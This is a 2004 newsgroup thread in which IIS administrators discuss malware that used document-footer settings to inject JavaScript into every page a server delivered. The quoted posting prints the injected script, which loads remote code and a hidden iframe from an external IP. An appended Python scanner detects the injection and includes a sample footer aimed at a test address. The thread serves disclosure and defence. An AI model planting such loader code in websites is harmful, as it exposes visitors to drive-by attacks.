Re: Russian IIS hack? Malicious Javascript code

From: Ron Guyor (rong_at_youngsinc.com)
Date: 06/24/04


Date: Thu, 24 Jun 2004 10:01:09 -0400

I hate to see this happening but it's good to know we're not alone. I've
removed the footer entries and removed the .dll files. I'm going to look for
the .exe file right now.

Ron

"Oca Hoeflein" <Oca Hoeflein@discussions.microsoft.com> wrote in message
news:F5E81692-8CC7-471B-9751-3A9C69ECB013@microsoft.com...
> I successfully removed some malicious code from my IIS 5.0 server that may
> not have had all its patches updated, but I cannot find any information on
> this malicious code that redirected on a random basis the users of my
> websites to a Russian website that appeared to be down, to a domain called
> balamut.com
> with an IP address of 217.107.218.147 which RDNS to
> unassigned.m10-msk-ru.e-neverland.net
>
> The JavaScript code lived in some fake dll files in the inetsrv folder.
> One fake .dll file was created for each web on my server and in the IIS
> metabase the defaultdocfooter was set to each of the dll files and
> enabledocfooter was set to true.
>
> The offending code was embedded in every file that the website delivered,
> and on pages that had embedded .js files the JavaScript for those pages would
> not function.
>
> I have posted the offending code, maybe someone can identify this?
>
> As proof check out a Google search for one of the functions in the code,
> okx12()
>
> You'll see the first link it returns is an RTF; if you view the HTML
> version you'll see this code appended to the bottom of the page.
>
> <script language="JavaScript"><!--
> var qxco7=document.cookie;function gc099(n21){var
> ix=qxco7.indexOf(n21+"=");if(ix==-1)return
> null;ix=qxco7.indexOf("=",ix)+1;var
> es=qxco7.indexOf(";",ix);if(es==-1)es=qxco7.length;return
> unescape(qxco7.substring(ix,es));}function sc088(n24,v8){var today=new
> Date();var expiry=new
> Date(today.getTime()+600000);if(v8!=null&&v8!="")document.cookie=n24+"="+esc
> ape(v8)+"; expires="+expiry.toGMTString();qxco7=document.cookie;}function
> okx12(){window.status="";setTimeout("okx12()",
> 200);}okx12();if(location.href.indexOf("https")!=0){if(gc099("trk716")==null
> ){document.write("<script language=\"JavaScript\"
> src=\"http://217.107.218.147/dot.php\"></script><iframe
> src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\"
> scrolling=\"no\"
> frameborder=\"no\"/>");sc088("trk716","4");}}// --></script>
>
>
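Added detection example, not code from either poster: because the IIS document footer is appended to every file the site serves, the injection described above shows up as markup after `</html>`, as HTML inside .js responses, and as script/iframe references to a bare IP address. The scanner below checks served response bodies for those indicators; the sample pages, the RFC 5737 address 203.0.113.10 and the site name www.example.com are constructed for the example.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# src="..." in a normal tag, or src=\"...\" inside a document.write() string literal.
SRC_RE = re.compile(r'src=\\?"(https?://[^"\\\s]+)', re.IGNORECASE)
IFRAME_RE = re.compile(r"<iframe[^>]*>", re.IGNORECASE)
DIM1_RE = re.compile(r'(height|width)=\\?"1\\?"', re.IGNORECASE)
# A document footer is appended after the file, so markup after </html> is a tell-tale.
TRAILING_SCRIPT_RE = re.compile(r"</html>\s*<script", re.IGNORECASE)

# Constructed samples: the footer mimics the shape of the quoted script, pointed at a test address.
FOOTER = (
    '<script language="JavaScript"><!--\n'
    'if(document.cookie.indexOf("trk716=")==-1){document.write("<script language=\\"JavaScript\\" '
    'src=\\"http://203.0.113.10/dot.php\\"></script><iframe src=\\"http://203.0.113.10/dot.php\\" '
    'height=\\"1\\" width=\\"1\\" scrolling=\\"no\\" frameborder=\\"no\\"/>");}// --></script>\n'
)
CLEAN_PAGE = '<html><body><h1>Hi</h1><script src="http://www.example.com/app.js"></script></body></html>\n'
INJECTED_PAGE = CLEAN_PAGE + FOOTER
INJECTED_JS = "function init(){}\n" + FOOTER


def is_ip_literal(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def scan_body(body: str, content_type: str, site_host: str) -> list[str]:
    """Return the sorted set of footer-injection indicators found in one served response."""
    found = set()
    if TRAILING_SCRIPT_RE.search(body):
        found.add("script-after-html-close")
    # The footer lands in every served file, so HTML tags inside a .js response are a giveaway.
    if "javascript" in content_type.lower() and "<script" in body.lower():
        found.add("html-in-js-file")
    for url in SRC_RE.findall(body):
        host = urlparse(url).hostname or ""
        if is_ip_literal(host):
            found.add(f"src-to-ip-literal:{host}")
        elif host and host.lower() != site_host.lower():
            found.add(f"src-to-foreign-host:{host}")
    for tag in IFRAME_RE.findall(body):
        if {d.lower() for d in DIM1_RE.findall(tag)} == {"height", "width"}:
            found.add("1x1-iframe")
    return sorted(found)
```

Run `scan_body(body, content_type, "www.example.com")` over captured responses; an empty list means none of the indicators were present, and the host names it returns are what to compare against the metabase's DefaultDocFooter entries.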